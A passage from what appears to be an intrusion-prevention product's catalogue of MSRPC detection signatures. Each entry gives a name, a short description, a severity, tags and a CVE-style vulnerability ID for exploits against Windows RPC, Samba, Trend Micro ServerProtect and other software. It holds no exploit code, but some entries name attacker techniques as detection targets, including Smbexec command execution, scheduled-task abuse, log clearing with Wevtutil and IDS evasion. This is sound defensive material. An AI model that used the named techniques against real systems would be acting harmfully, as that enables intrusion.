
About this situation: Windows RPC Locator Buffer Overflow (MS03-001)
Context: MSRPC Client Payload Stream
Severity: 10
Tags: Windows XP, Windows 2000, Windows NT 4.0, x86, RPC Locator, MS2003, CVE2003, Windows XP not specific, Windows 2000 not specific, Windows NT 4.0 not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: Windows-RPC-Locator-BOF-MS03-001
Description:
Back to top

MSRPC-TCP_CPS-Rpc445-MS03-049

About this situation: Buffer Overflow in Windows RPC Service (MS03-049)
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows XP, Windows 2000, Any Hardware, RPC, MS2003, CVE2003, Windows XP not specific, Windows 2000 not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-512-5211
Vulnerability: RPC-BOF-MS03-049
Description:
Back to top

MSRPC-TCP_CPS-Rpcss-RemoteCreateInstance-Race-DoS

About this situation: Denial of service exploit against a multi-threaded race condition in Windows RPC DCOM with MS03-039 patch installed
Context: MSRPC Client Payload Stream
Severity: 10
Tags: Windows, x86, MS2004, CVE2003, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-359-4219
Last changed: sgpkg-ips-812-5242
Vulnerability: MSRPC-Rpcss-RemoteCreateInstance-Race-DoS
Description:
Back to top

MSRPC-TCP_CPS-Samba-LSA-LsarAddPrivilegesToAccount-Buffer-Overflow

About this situation: Detects crafted LsarAddPrivilegesToAccount requests
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Linux, Any Hardware, Samba, CVE2007, Linux not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-153-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: MSRPC-Samba-LSA-LsarAddPrivilegesToAccount-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Samba-LSA-LsarLookupSids-Buffer-Overflow

About this situation: Detects crafted LsarLookupSids requests
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Linux, Any Hardware, Samba, CVE2007, Linux not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-153-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: MSRPC-Samba-LSA-LsarLookupSids-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Samba-LSA-RPC-LsaIoTransNames-Request-Handling-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in Samba Team Samba detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, CVE2007, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-357-4219
Last changed: sgpkg-ips-499-5211
Vulnerability: Samba-LSA-RPC-LsaIoTransNames-Request-Handling-Heap-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Samba-NetDFS-RPC-NetDFS-io-dfs-EnumInfo-D-Handling-Heap-Overflow

About this situation: Buffer overflow exploit against Samba detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, x86, Samba, CVE2007, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-110-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: Samba-NetDFS-RPC-NetDFS-io-dfs-EnumInfo-D-Handling-Heap-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Samba-Printer-Server-Spoolss-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Samba Team Samba detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1059-5242
Vulnerability: Samba-Printer-Server-Spoolss-Denial-Of-Service
Description:
Back to top

MSRPC-TCP_CPS-Samba-smbd-Serverpasswordset-RPC-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Samba Team Samba detected
Context: MSRPC Client Payload Stream
Severity: 10
Tags: Linux, Any Hardware, Samba, CVE2015, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-632-5211
Vulnerability: Samba-smbd-Serverpasswordset-RPC-Memory-Corruption
Description:
Back to top

MSRPC-TCP_CPS-Samba-Spoolss-RPC-SmbIoNotifyOptionTypeData-Request-Handling-BOF

About this situation: An attempt to exploit a vulnerability in Samba Team Samba detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, CVE2007, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-361-4219
Last changed: sgpkg-ips-870-5242
Vulnerability: Samba-Spoolss-RPC-SmbIoNotifyOptionTypeData-Request-Handling-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Shared-Variable-Fingerprints

About this situation: This fingerprint sets shared variables
Context: MSRPC Client Payload Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-1794-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

MSRPC-TCP_CPS-Trend-Micro-ServerProtect-CreateBinding-DCE-RPC-Stack-Overflow

About this situation: Buffer overflow exploit against Trend Micro ServerProtect detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, x86, Trend Micro ServerProtect, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-668-5211
Last changed: sgpkg-ips-668-5211
Vulnerability: Trend-Micro-ServerProtect-CreateBinding-DCE-RPC-Stack-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Trend-Micro-ServerProtect-EarthAgent-DCE-RPC-Stack-Overflow

About this situation: Buffer overflow exploit against Trend Micro ServerProtect detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, x86, Trend Micro ServerProtect, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-668-5211
Last changed: sgpkg-ips-668-5211
Vulnerability: Trend-Micro-ServerProtect-EarthAgent-DCE-RPC-Stack-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Trend-Micro-ServerProtect-EarthAgent-RPC-RPCFN-CopyAUSrc-BOF

About this situation: Buffer overflow exploit against Trend Micro ServerProtect detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, Any Hardware, Trend Micro ServerProtect, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-668-5211
Last changed: sgpkg-ips-668-5211
Vulnerability: Trend-Micro-ServerProtect-EarthAgent-RPC-RPCFN-CopyAUSrc-BOF
Description:
Back to top

MSRPC-TCP_CPS-Trend-Micro-ServerProtect-RPC-ActiveUpdate-And-ActiveRollback-BOF

About this situation: Buffer overflow exploit against Trend Micro's ServerProtect detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro ServerProtect, CVE2007, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-668-5211
Last changed: sgpkg-ips-668-5211
Vulnerability: Generic-Trend-Micro-ServerProtect-RPC-ActiveUpdate-And-ActiveRollback-BOF
Description:
Back to top

MSRPC-TCP_CPS-Trend-Micro-ServerProtect-RPC-Call-CMON-NetTestConnection-BOF

About this situation: Buffer overflow exploit against Trend Micro's ServerProtect detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro ServerProtect, CVE2007, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-668-5211
Last changed: sgpkg-ips-668-5211
Vulnerability: Generic-Trend-Micro-ServerProtect-RPC-Call-CMON-NetTestConnection-BOF
Description:
Back to top

MSRPC-TCP_CPS-Trend-Micro-ServerProtect-RPC-Call-ENG-SendEMail-Buffer-Overflow

About this situation: Buffer overflow exploit against Trend Micro's ServerProtect detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro ServerProtect, CVE2007, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-668-5211
Last changed: sgpkg-ips-668-5211
Vulnerability: Generic-Trend-Micro-ServerProtect-RPC-Call-ENG-SendEMail-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Trend-Micro-ServerProtect-RPC-ENG-SetRealTimeScanConfigInfo-BOF

About this situation: Buffer overflow exploit against Trend Micro's ServerProtect detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro ServerProtect, CVE2007, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-668-5211
Last changed: sgpkg-ips-668-5211
Vulnerability: Generic-Trend-Micro-ServerProtect-RPC-ENG-SetRealTimeScanConfigInfo-BOF
Description:
Back to top

MSRPC-TCP_CPS-Trend-Micro-ServerProtect-RPC-NTF-SetPagerNotifyConfig-Buffer-Overflow

About this situation: Buffer overflow exploit against Trend Micro ServerProtect detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, Any Hardware, Trend Micro ServerProtect, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-668-5211
Last changed: sgpkg-ips-668-5211
Vulnerability: Trend-Micro-ServerProtect-RPC-NTF-SetPagerNotifyConfig-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Trend-Micro-ServerProtect-RPC-RPCFN-CMON-SetSvcImpersonateUser-BOF

About this situation: Buffer overflow exploit against Trend Micro ServerProtect detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, Any Hardware, Trend Micro ServerProtect, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-668-5211
Last changed: sgpkg-ips-668-5211
Vulnerability: Trend-Micro-ServerProtect-RPC-RPCFN-CMON-SetSvcImpersonateUser-BOF
Description:
Back to top

MSRPC-TCP_CPS-Trend-Micro-ServerProtect-RPCFN-Engine-RPC-Buffer-Overflows

About this situation: Buffer overflow exploit against Trend Micro ServerProtect detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, Any Hardware, Trend Micro ServerProtect, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-668-5211
Last changed: sgpkg-ips-668-5211
Vulnerability: Trend-Micro-ServerProtect-RPCFN-Engine-RPC-Buffer-Overflows
Description:
Back to top

MSRPC-TCP_CPS-Trend-Micro-ServerProtect-SPNT-Engine-RPC-Buffer-Overflows

About this situation: Buffer overflow exploit against Trend Micro ServerProtect detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, Any Hardware, Trend Micro ServerProtect, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-668-5211
Last changed: sgpkg-ips-668-5211
Vulnerability: Trend-Micro-ServerProtect-SPNT-Engine-RPC-Buffer-Overflows
Description:
Back to top

MSRPC-TCP_CPS-Veritas-Backup-Exec-Server-Anonymous-Registry-Access

About this situation: Detects anonymous bind to specific interface and registry-related function call against VERITAS Backup Exec for Windows
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, x86, Veritas Software BackUp Exec, CVE2005, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-668-5211
Last changed: sgpkg-ips-1399-5242
Vulnerability: Veritas-Backup-Exec-Server-Remote-Registry-Access
Description:
Back to top

MSRPC-TCP_CPS-VMware-Vcenter-Server-Out-Of-Bounds-Write-CVE-2024-38812

About this situation: An attempt to exploit a vulnerability in VMWare vCenter Server detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VMware vCenter Server, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1818-5242
Last changed: sgpkg-ips-1818-5242
Vulnerability: VMware-Vcenter-Server-Out-Of-Bounds-Write-CVE-2024-38812
Description:
Back to top

MSRPC-TCP_CPS-Vulnerable-Microsoft-License-Logging-Server-Function-Called

About this situation: Vulnerable Microsoft Licence Logging Server function called
Context: MSRPC Client Payload Stream
Severity: 2
Tags: Windows, Any Hardware, MS2009-11, CVE2009, Windows not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-589-5211
Vulnerability: Microsoft-License-Logging-Server-RPC-Call-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Vulnerable-Microsoft-Windows-Server-Service-Function-Called

About this situation: Vulnerable Microsoft Windows Server service function called
Context: MSRPC Client Payload Stream
Severity: 2
Tags: Windows, x86, MS2006-08, CVE2006, Windows not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-803-5242
Vulnerability: MSRPC-Microsoft-Windows-Server-Service-Buffer-Overrun
Description:
Back to top

MSRPC-TCP_CPS-Vulnerable-Microsoft-Windows-Server-Service-Function-Called-2

About this situation: Vulnerable Microsoft Windows Server service function called
Context: MSRPC Client Payload Stream
Severity: 2
Tags: Windows, x86, MS2008-10, CVE2008, Windows not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-178-2032
Last changed: sgpkg-ips-803-5242
Vulnerability: Windows-MSRPC-SRVSVC-Unicode-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Windows-Local-Security-Authority-Username-Disclosure

About this situation: Windows account name listing via MSRPC
Context: MSRPC Client Payload Stream
Severity: 2
Tags: Windows, x86, Windows not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-126-2032
Last changed: sgpkg-ips-589-5211
Vulnerability: MSRPC-Windows-Local-Security-Authority-Username-Disclosure
Description:
Back to top

MSRPC-TCP_CPS-Windows-MSRPC-SRVSVC-Unicode-Buffer-Overflow

About this situation: Detects attempts to exploit a buffer overflow vulnerability in MSRPC Server Service
Context: MSRPC Client Payload Stream
Severity: 10
Tags: Windows, Any Hardware, MS2008-10, CVE2008, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-177-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Windows-MSRPC-SRVSVC-Unicode-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Windows-PnP-Buffer-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in the Windows PnP service
Context: MSRPC Client Payload Stream
Severity: 10
Tags: Windows 2000, Windows XP SP1, x86, UPnP, MS2005-08, CVE2005, Windows 2000 not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-302-4219
Vulnerability: Microsoft-Windows-PnP-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Windows-PnP-Service-Remote-Access

About this situation: Detects a remote access made to Windows Plug and Play service
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows 2000, Windows XP SP1, x86, UPnP, MS2005-08, CVE2005, Windows 2000 not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-Windows-PnP-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_CPS-Windows-Remote-Desktop-Licensing-Service-Information-Disclosure-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Server
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2024, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1842-5242
Last changed: sgpkg-ips-1842-5242
Vulnerability: Windows-Remote-Desktop-Licensing-Service-Information-Disclosure-Vulnerability
Description:
Back to top

MSRPC-TCP_CPS-Windows-Smbexec-Service-Create-Start-Command-Execution

About this situation: Command execution by means of creating and starting Windows services with crafted commands
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1519-5242
Last changed: sgpkg-ips-1519-5242
Vulnerability: Windows-Smbexec-Service-Create-Start-Command-Execution
Description:
Back to top

MSRPC-TCP_CPS_Trend-Micro-ServerProtect-RPC-Call-CMON-NetTestConnection-Access

About this situation: Access to a vulnerable rpc interface in Trend Micro's ServerProtect detected
Context: MSRPC Client Payload Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Trend Micro ServerProtect, CVE2007, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-668-5211
Last changed: sgpkg-ips-668-5211
Vulnerability: Generic-Trend-Micro-ServerProtect-RPC-Call-CMON-NetTestConnection-BOF
Description:
Back to top

MSRPC-TCP_CS-Nessus-Vulnerability-Scanner-Usage

About this situation: Detects MSRPC requests made by the Nessus vulnerability scanner
Context: TCP MSRPC Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Nessus, Any Operating System not specific, Potential Probe, TCP Client Traffic
First detected in: sgpkg-ips-668-5211
Last changed: sgpkg-ips-668-5211
Vulnerability: Nessus-Vulnerability-Scanner-Usage
Description:
Back to top

MSRPC-TCP_Encryption-Usage

About this situation: Microsoft MSRPC encryption usage detected
Context: TCP MSRPC Client Stream
Severity: 1
Tags: Windows, x86, Windows not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-96-1314
Last changed: sgpkg-ips-486-5211
Vulnerability: MSRPC-Encryption-Usage
Description:
Back to top

MSRPC-TCP_Microsoft-Windows-RDL-Service-NTLM-Null-Session-Request

About this situation: Windows Remote Desktop Licensing (RDL) Service authentication request without username
Context: TCP MSRPC Client Stream
Severity: 2
Tags: Windows, Any Hardware, MS2024-07, CVE2024, Windows not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-1794-5242
Last changed: sgpkg-ips-1794-5242
Vulnerability: Microsoft-Windows-Remote-Desktop-Licensing-Service-Improper-Authentication
Description:
Back to top

MSRPC-TCP_Microsoft-Windows-Remote-Desktop-Licensing-Service-Buffer-Overread

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Server detected
Context: TCP MSRPC Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2024-07, CVE2024, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1801-5242
Last changed: sgpkg-ips-1801-5242
Vulnerability: Microsoft-Windows-Remote-Desktop-Licensing-Service-Buffer-Overread
Description:
Back to top

MSRPC-TCP_MS-RPC-DCOM-Interface-DoS-MS03-039-2

About this situation: Denial of Service attack against Windows RPC DCOM Interface
Context: TCP MSRPC Client Stream
Severity: 2
Tags: Windows 2000 SP3, Windows 2000 SP4, x86, Windows DCOM RPC Service, MS2003, CVE2003, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-667-5211
Vulnerability: MS-RPC-DCOM-Interface-DoS-MS03-039
Description:
Back to top

MSRPC-TCP_MSRPC-Request

About this situation: MSRCP Request to unidentified UUID detected
Context: MSRPC Client Payload Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-588-5211
Last changed: sgpkg-ips-588-5211
Description:
Back to top

MSRPC-TCP_Novell-Client-Printer-Spooler-Service-EnumPrinterDrivers-Server-Name

About this situation: Detected an attempt to exploit a vulnerability in Novell Client
Context: MSRPC Client Payload Stream
Severity: 10
Tags: Windows, Any Hardware, Novell Client, CVE2007, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-466-5211
Last changed: sgpkg-ips-466-5211
Vulnerability: Novell-Client-Printer-Spooler-Service-Request-Server-Name-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_Novell-Client-Printer-Spooler-Service-EnumPrinters-Server-Name

About this situation: Detected an attempt to exploit a vulnerability in Novell Client
Context: MSRPC Client Payload Stream
Severity: 10
Tags: Windows, Any Hardware, Novell Client, CVE2006, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-466-5211
Last changed: sgpkg-ips-466-5211
Vulnerability: Novell-Client-Printer-Spooler-Service-Server-Name-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_NTLMSSP-Authentication-Null-Session-Denial-Of-Service

About this situation: Denial of service exploit against MSRPCSS service via NTLMSSP NULL session authentication
Context: TCP MSRPC Client Stream
Severity: 2
Tags: Windows, x86, MS2007-10, MS2009-10, CVE2007, CVE2009, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-125-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: MSRPC-NTLMSSP-Authentication-Null-Session-Denial-Of-Service
MSRPC-LSASS-DOS-MS09-059
Description:
Back to top

MSRPC-TCP_OPC-Alerts-And-Events

About this situation: OPC Alerts and Events UUID detected
Context: MSRPC Client Payload Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-588-5211
Last changed: sgpkg-ips-588-5211
Description:
Back to top

MSRPC-TCP_OPC-Auxiliary

About this situation: OPC Auxiliary UUID detected
Context: MSRPC Client Payload Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-588-5211
Last changed: sgpkg-ips-588-5211
Description:
Back to top

MSRPC-TCP_OPC-Data-Access

About this situation: OPC Data Access UUID detected
Context: MSRPC Client Payload Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-588-5211
Last changed: sgpkg-ips-588-5211
Description:
Back to top

MSRPC-TCP_OPC-Historical-Data-Access

About this situation: OPC Historical Data Access UUID detected
Context: MSRPC Client Payload Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OPC, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-588-5211
Last changed: sgpkg-ips-588-5211
Description:
Back to top

MSRPC-TCP_Remote-Registry-Service-Elevation-Of-Privilege-CVE-2024-43532

About this situation: An attempt to exploit a vulnerability in Windows' Remote Registry client detected
Context: TCP MSRPC Client Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2024, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1793-5242
Last changed: sgpkg-ips-1793-5242
Vulnerability: Remote-Registry-Service-Elevation-Of-Privilege-CVE-2024-43532
Description:
Back to top

MSRPC-TCP_Samba-DCE-RPC-IDL-Parser-Out-Of-Bounds-Array-Access

About this situation: An attempt to exploit a vulnerability in Samba Team Samba detected
Context: MSRPC Client Payload Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Samba, CVE2012, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-449-4219
Last changed: sgpkg-ips-466-5211
Vulnerability: Samba-DCE-RPC-IDL-Parser-Out-Of-Bounds-Array-Access
Description:
Back to top

MSRPC-TCP_Samba-IDL-Parser-Out-Of-Bounds-Array-EventLog

About this situation: An attempt to call a vulnerable function in Samba detected
Context: MSRPC Client Payload Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Samba, CVE2012, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-463-5211
Last changed: sgpkg-ips-466-5211
Vulnerability: Samba-DCE-RPC-IDL-Parser-Out-Of-Bounds-Array-Access
Description:
Back to top

MSRPC-TCP_Samba-IDL-Parser-Out-Of-Bounds-Array-LsarLookupNames3

About this situation: An attempt to call a vulnerable function in Samba detected
Context: MSRPC Client Payload Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Samba, CVE2012, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-463-5211
Last changed: sgpkg-ips-466-5211
Vulnerability: Samba-DCE-RPC-IDL-Parser-Out-Of-Bounds-Array-Access
Description:
Back to top

MSRPC-TCP_Samba-IDL-Parser-Out-Of-Bounds-Array-SetInfoPolicy

About this situation: An attempt to call a vulnerable function in Samba detected
Context: MSRPC Client Payload Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Samba, CVE2012, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-527-5211
Last changed: sgpkg-ips-527-5211
Vulnerability: Samba-DCE-RPC-IDL-Parser-Out-Of-Bounds-Array-Access
Description:
Back to top

MSRPC-TCP_Samba-IDL-Parser-Out-Of-Bounds-Array-Vulnerable-Function-Call

About this situation: An attempt to call a vulnerable function in Samba detected
Context: MSRPC Client Payload Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Samba, CVE2012, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-463-5211
Last changed: sgpkg-ips-589-5211
Vulnerability: Samba-DCE-RPC-IDL-Parser-Out-Of-Bounds-Array-Access
Description:
Back to top

MSRPC-TCP_Samba-RPC-LsarAddPrivilegesToAccount-Crafted-Request-Handling-Overflow

About this situation: An attempt to exploit a vulnerability in Samba Team Samba detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, CVE2007, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-357-4219
Last changed: sgpkg-ips-463-5211
Vulnerability: Samba-LSA-RPC-LsarAddPrivilegesToAccount-Crafted-Request-Handling-Heap-Overflow
Description:
Back to top

MSRPC-TCP_Samba-SRVSVC-RPC-SecIoAcl-Request-Handling-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Samba Team Samba detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, CVE2007, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Samba-SRVSVC-RPC-SecIoAcl-Request-Handling-Heap-Buffer-Overflow
Description:
Back to top

MSRPC-TCP_Schtasks_Create_Task

About this situation: A new task created by Schtasks was detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1387-5242
Last changed: sgpkg-ips-1387-5242
Description:
Back to top

MSRPC-TCP_Schtasks_Delete_Task

About this situation: A task removal by Schtasks was detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1387-5242
Last changed: sgpkg-ips-1387-5242
Description:
Back to top

MSRPC-TCP_Schtasks_Run_Task

About this situation: A task execution by Schtasks was detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1387-5242
Last changed: sgpkg-ips-1387-5242
Description:
Back to top

MSRPC-TCP_Small-Fragments-Used

About this situation: Detects MSRPC traffic over TCP using small fragments
Context: TCP MSRPC Client Stream
Severity: 7
Tags: Windows, x86, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-127-2032
Last changed: sgpkg-ips-600-5211
Vulnerability: MSRPC-Small-Fragments-Used
Description:
Back to top

MSRPC-TCP_Suspicious-Request

About this situation: Detected exploit towards NetrJoinDomain Account Name
Context: TCP MSRPC Client Stream
Severity: 7
Tags: Windows XP, Windows 2000, x86, Windows XP not specific, Windows 2000 not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-560-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

MSRPC-TCP_Wevtutil-Clear-Logs

About this situation: A log removal by Wevtutil was detected
Context: MSRPC Client Payload Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1387-5242
Last changed: sgpkg-ips-1387-5242
Description:
Back to top

MSRPC-UDP_Big-Endian-Byte-Order-Used

About this situation: Big endian byte order detected in MSRPC requests, possible IDS evasion attempt
